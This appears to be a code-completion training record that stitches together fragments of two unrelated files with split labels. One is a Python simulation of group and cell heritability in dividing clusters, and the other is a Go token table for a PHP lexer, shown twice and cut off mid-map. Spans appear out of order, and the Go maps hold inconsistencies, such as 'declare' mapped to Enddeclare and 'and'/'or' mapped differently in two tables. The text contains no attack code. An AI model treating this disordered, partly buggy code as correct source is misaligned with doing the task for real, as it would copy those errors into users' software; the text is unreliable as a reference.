#run through a round of reproduction
for j in range(0,timesteps_to_run):
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
cells_added=len(cell_genos)*cluster_size*2**(timestep)
print(int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep),off_spring_std)))
cells_added_first=len(cell_genos)*cluster_size*2**(timestep-1) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
#cells_added_first=int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep-1),off_spring_std)) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
"""
print("st_dev value %d of %d" %(ii, number_of_stdevs))
print("cluster size", a)
print("replicate", b)
print("generation number", timestep)
print("population size", len(cell_genos)*cluster_size*2**(timestep-1))
print("number of cells added this timestep", cells_added)
"""
#first cluster produced
cluster_variance_factor=np.random.normal(1,st_dev_group)
for i in range(0,cells_added_first): #this loops through every additional cell for the first cluster offspring
if (cluster_max+math.floor(i/cluster_size))!=(cluster_max+math.floor((i-1)/cluster_size)): #if your cluster number does not equal the one lower down from you, then you get a new cluster-level variance factor.
cluster_variance_factor=np.random.normal(1,st_dev_group)
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added_first][1],np.random.normal(pop[(cell_max+i)-cells_added_first][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added_first][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added_first][4],0,0,0,pop[(cell_max+i)-cells_added_first][2]]])
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
#second cluster produced
for i in range(0,cells_added_first):
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added][1],np.random.normal(pop[(cell_max+i)-cells_added][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added][4],0,0,0,pop[(cell_max+i)-cells_added][2]]])
timestep+=1
pop1=[]
for j in range(np.shape(pop)[0]):
if np.random.rand() > 0.05:
pop1.append(pop[j])
np.savetxt("full-population.csv", pop1, delimiter=",") #this will save a CSV of the whole run, use for statistics or error-checking
cell_x=pop[:,9]
cell_y=pop[:,2]
cell_x=cell_x[len(cell_genos)*cluster_size:]
cell_y=cell_y[len(cell_genos)*cluster_size:]
#linear regression of parent on offspring phenotype
#print("slope of parent-offspring regression for CELL size is", linregress(cell_x,cell_y)[0])
#Pandas dataframe work isolating groups
df=pd.DataFrame(pop1)
size_by_ID=df.groupby(4)[2].sum()
parent_by_ID=df.groupby(4)[5].mean()
print("I AM HERE!!!")
joined=pd.concat([size_by_ID,parent_by_ID], axis=1, ignore_index=True)
parent_size=[]
for i in range(0,len(joined[0])):
j=joined[1][i]
parent_size.append(joined[0][j])
offspring_size=joined[0]
| offspring_radius=[]
for i in range(0,len(parent_size_cleaned)):
parent_radius.append((3.*parent_size_cleaned[i]/(4.*math.pi))**(1./3.)) #manual check of this calculation confirmed it is correct
for i in range(0,len(offspring_size_cleaned)):
offspring_radius.append((3.*offspring_size_cleaned[i]/(4.*math.pi))**(1./3.))
parent_stokes=[]
offspring_stokes=[]
for i in range(0,len(parent_size_cleaned)):
parent_stokes.append((9.81*(2*parent_radius[i])**2*(.1)) / (18.*1.002)) #Manual check of this calculation confirms it is correct. #9.81 is m/s gravity, then diameter (in Meters, which we might want to change!), then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
for i in range(0,len(offspring_size_cleaned)):
offspring_stokes.append((9.81*(2*offspring_radius[i])**2*(.1)) / (18.*1.002)) #9.81 is m/s gravity, then diameter, then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
"""
print("slope of parent-offspring regression for GROUP volume is", linregress(parent_size_cleaned,offspring_size_cleaned)[0])
print("slope of parent-offspring regression for GROUP radius is", linregress(parent_radius,offspring_radius)[0])
print("slope of parent-offspring regression for GROUP settling speed is", linregress(parent_stokes,offspring_stokes)[0])
print("size", parent_size_cleaned[1], len(parent_size_cleaned))
print("radius", parent_radius[1], len(parent_radius))
print("stokes", parent_stokes[1], len(parent_stokes))
"""
#group_sizes.append(a)
group_sizes_list[ii].append(a)
#slope_cell.append(linregress(cell_x,cell_y)[0])
#slope_group_volume.append(linregress(parent_size_cleaned,offspring_size_cleaned)[0])
#slope_group_radius.append(linregress(parent_radius,offspring_radius)[0])
#slope_group_settling.append(linregress(parent_stokes,offspring_stokes)[0])
"""
print("heritability groups", (linregress(parent_size_cleaned,offspring_size_cleaned)[0]))
print("heritability cells", (linregress(cell_x,cell_y)[0]))
"""
tempratio=(linregress(parent_size_cleaned,offspring_size_cleaned)[0]) / (linregress(cell_x,cell_y)[0])
stdev_list[ii].append(tempratio)
cmap = plt.get_cmap('rainbow')
colors = [cmap(i) for i in np.linspace(0, 1, len(stdev_list))]
#print "group_sizes", group_sizes, len(group_sizes)
#print "stdev_list[4]", stdev_list[0], len(stdev_list[0])
#print "group_sizes_list[4]", group_sizes_list[0], len(group_sizes_list[0])
for i, color in enumerate(colors, start=0):
plt.scatter(group_sizes_list[i],stdev_list[i], color=color, alpha=.5)
plt.xlabel('Mean number of cells per group')
plt.ylabel('Ratio of group to cellular-level heritability for size')
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.png" %(st_dev_group), dpi=300)
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.pdf" %(st_dev_group)) | parent_size_cleaned=list(parent_size[len(cell_genos):])
offspring_size_cleaned=list(offspring_size[len(cell_genos):])
parent_radius=[]
| random_line_split |
Script 1-relative heritability-plotted(Figure 2a)-2.py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 06 10:26:07 2016
@author: Will Ratcliff
"""
import numpy as np
np.set_printoptions(threshold=np.nan)
import math
from scipy.stats import linregress
import matplotlib.pyplot as plt
import pandas as pd
cell_genos=np.linspace(1,2,10)
st_dev_cell=0.3
st_dev_group=0.25
timesteps_to_run=4 #this is equivalent to the number of generations the seed population of 10 clusters (each with a different genetic mean size) goes through.
number_of_stdevs=5 #this name is a bit confusing, but this is the number of different st_devs to be run in the iteration
replicates=10
#use these lists for running multiple iterations of cell and group stdevs
group_stdev_iterator=np.linspace(.0001,st_dev_cell,number_of_stdevs)
cell_stdev_iterator=np.linspace(.0001,st_dev_group,number_of_stdevs)
group_sizes=[]
st_dev_cells=[]
st_dev_groups=[]
slope_cell=[]
slope_group_volume=[]
slope_group_radius=[]
slope_group_settling=[]
stdev_list = [ [] for i in range(number_of_stdevs) ]
group_sizes_list = [ [] for i in range(len(cell_genos)) ]
gs=4 #is the number of cells per group from 2 to 32
"""So, here's how the population is initialized:
Col A: Cell ID (#)
Col B: Cell genetic size
Col C: Cellular phenotype
Col D: Cell parent
Col E: Cluster ID (#)
Col F: Cluster parent
Col G: empty
Col H: empty
Col I: empty
Col J: Cell parental phenotype"""
for ii in range(0,len(stdev_list)):
for a in np.arange(2,gs+2,2):
cluster_size=a
off_spring_std=a/3
for b in range(0,replicates):
pop=np.zeros((len(cell_genos)*cluster_size,replicates))
#print(np.shape(pop))
st_dev_cell=cell_stdev_iterator[ii] #change this to st_dev_group=group_stdev_iterator[ii] to iterate across group-level variance
#st_dev_group=group_stdev_iterator[ii]
#initialize the population
#for i in range(0,np.shape(pop)[0]):
for i in range(0,np.shape(pop)[0]):
pop[i][0]=i #ID each cell
pop[i][1]=cell_genos[math.floor(i/cluster_size)]
pop[i][2]=np.random.normal(pop[i][1],st_dev_cell)
pop[i][4]=math.floor(i/cluster_size)
timestep=1
#print(np.shape(pop))
pop1=pop
#run through a round of reproduction
for j in range(0,timesteps_to_run):
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
cells_added=len(cell_genos)*cluster_size*2**(timestep)
print(int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep),off_spring_std)))
cells_added_first=len(cell_genos)*cluster_size*2**(timestep-1) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
#cells_added_first=int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep-1),off_spring_std)) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
"""
print("st_dev value %d of %d" %(ii, number_of_stdevs))
print("cluster size", a)
print("replicate", b)
print("generation number", timestep)
print("population size", len(cell_genos)*cluster_size*2**(timestep-1))
print("number of cells added this timestep", cells_added)
"""
#first cluster produced
cluster_variance_factor=np.random.normal(1,st_dev_group)
for i in range(0,cells_added_first): #this loops through every additional cell for the first cluster offspring
if (cluster_max+math.floor(i/cluster_size))!=(cluster_max+math.floor((i-1)/cluster_size)): #if your cluster number does not equal the one lower down from you, then you get a new cluster-level variance factor.
|
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added_first][1],np.random.normal(pop[(cell_max+i)-cells_added_first][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added_first][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added_first][4],0,0,0,pop[(cell_max+i)-cells_added_first][2]]])
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
#second cluster produced
for i in range(0,cells_added_first):
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added][1],np.random.normal(pop[(cell_max+i)-cells_added][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added][4],0,0,0,pop[(cell_max+i)-cells_added][2]]])
timestep+=1
pop1=[]
for j in range(np.shape(pop)[0]):
if np.random.rand() > 0.05:
pop1.append(pop[j])
np.savetxt("full-population.csv", pop1, delimiter=",") #this will save a CSV of the whole run, use for statistics or error-checking
cell_x=pop[:,9]
cell_y=pop[:,2]
cell_x=cell_x[len(cell_genos)*cluster_size:]
cell_y=cell_y[len(cell_genos)*cluster_size:]
#linear regression of parent on offspring phenotype
#print("slope of parent-offspring regression for CELL size is", linregress(cell_x,cell_y)[0])
#Pandas dataframe work isolating groups
df=pd.DataFrame(pop1)
size_by_ID=df.groupby(4)[2].sum()
parent_by_ID=df.groupby(4)[5].mean()
print("I AM HERE!!!")
joined=pd.concat([size_by_ID,parent_by_ID], axis=1, ignore_index=True)
parent_size=[]
for i in range(0,len(joined[0])):
j=joined[1][i]
parent_size.append(joined[0][j])
offspring_size=joined[0]
parent_size_cleaned=list(parent_size[len(cell_genos):])
offspring_size_cleaned=list(offspring_size[len(cell_genos):])
parent_radius=[]
offspring_radius=[]
for i in range(0,len(parent_size_cleaned)):
parent_radius.append((3.*parent_size_cleaned[i]/(4.*math.pi))**(1./3.)) #manual check of this calculation confirmed it is correct
for i in range(0,len(offspring_size_cleaned)):
offspring_radius.append((3.*offspring_size_cleaned[i]/(4.*math.pi))**(1./3.))
parent_stokes=[]
offspring_stokes=[]
for i in range(0,len(parent_size_cleaned)):
parent_stokes.append((9.81*(2*parent_radius[i])**2*(.1)) / (18.*1.002)) #Manual check of this calculation confirms it is correct. #9.81 is m/s gravity, then diameter (in Meters, which we might want to change!), then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
for i in range(0,len(offspring_size_cleaned)):
offspring_stokes.append((9.81*(2*offspring_radius[i])**2*(.1)) / (18.*1.002)) #9.81 is m/s gravity, then diameter, then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
"""
print("slope of parent-offspring regression for GROUP volume is", linregress(parent_size_cleaned,offspring_size_cleaned)[0])
print("slope of parent-offspring regression for GROUP radius is", linregress(parent_radius,offspring_radius)[0])
print("slope of parent-offspring regression for GROUP settling speed is", linregress(parent_stokes,offspring_stokes)[0])
print("size", parent_size_cleaned[1], len(parent_size_cleaned))
print("radius", parent_radius[1], len(parent_radius))
print("stokes", parent_stokes[1], len(parent_stokes))
"""
#group_sizes.append(a)
group_sizes_list[ii].append(a)
#slope_cell.append(linregress(cell_x,cell_y)[0])
#slope_group_volume.append(linregress(parent_size_cleaned,offspring_size_cleaned)[0])
#slope_group_radius.append(linregress(parent_radius,offspring_radius)[0])
#slope_group_settling.append(linregress(parent_stokes,offspring_stokes)[0])
"""
print("heritability groups", (linregress(parent_size_cleaned,offspring_size_cleaned)[0]))
print("heritability cells", (linregress(cell_x,cell_y)[0]))
"""
tempratio=(linregress(parent_size_cleaned,offspring_size_cleaned)[0]) / (linregress(cell_x,cell_y)[0])
stdev_list[ii].append(tempratio)
cmap = plt.get_cmap('rainbow')
colors = [cmap(i) for i in np.linspace(0, 1, len(stdev_list))]
#print "group_sizes", group_sizes, len(group_sizes)
#print "stdev_list[4]", stdev_list[0], len(stdev_list[0])
#print "group_sizes_list[4]", group_sizes_list[0], len(group_sizes_list[0])
for i, color in enumerate(colors, start=0):
plt.scatter(group_sizes_list[i],stdev_list[i], color=color, alpha=.5)
plt.xlabel('Mean number of cells per group')
plt.ylabel('Ratio of group to cellular-level heritability for size')
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.png" %(st_dev_group), dpi=300)
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.pdf" %(st_dev_group))
| cluster_variance_factor=np.random.normal(1,st_dev_group) | conditional_block |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml
EncapsedAndWhitespace
ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string |
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok {
return t
}
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
}
| {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
} | identifier_body |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml | ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
